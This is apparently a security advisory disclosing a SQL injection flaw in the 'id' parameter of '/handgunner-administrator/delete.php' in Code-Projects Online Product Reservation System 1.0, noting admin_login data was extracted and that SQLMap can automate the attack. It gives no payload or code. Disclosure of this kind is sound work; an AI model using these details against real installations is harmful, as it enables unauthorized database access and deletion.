Code-Projects Online Product Reservation System SQL Injection Vulnerability in Delete Functionality

A critical SQL injection vulnerability has been identified in Code-Projects Online Product Reservation System version 1.0. The issue resides in the product deletion feature within the file '/handgunner-administrator/delete.php'. The vulnerability arises because user input is directly appended to a DELETE SQL query without proper validation or authentication. This flaw allows attackers to manipulate the 'id' parameter, potentially leading to unauthorized data extraction and deletion of database records. The vulnerability can be exploited remotely, and a public exploit is available.

Impact

Exploitation of this vulnerability allows for SQL injection, where an attacker can interfere with the application's database queries. This could lead to unauthorized data access, manipulation, or deletion. In this case, the vulnerability was exploited to extract data from the 'admin_login' table of the 'cj_handgunner' database.

Reproduction

The vulnerability can be reproduced by sending a POST request to 'handgunner-administrator/delete.php' with an 'id' parameter. The absence of input validation allows for SQL injection, which can be automated using a tool like SQLMap.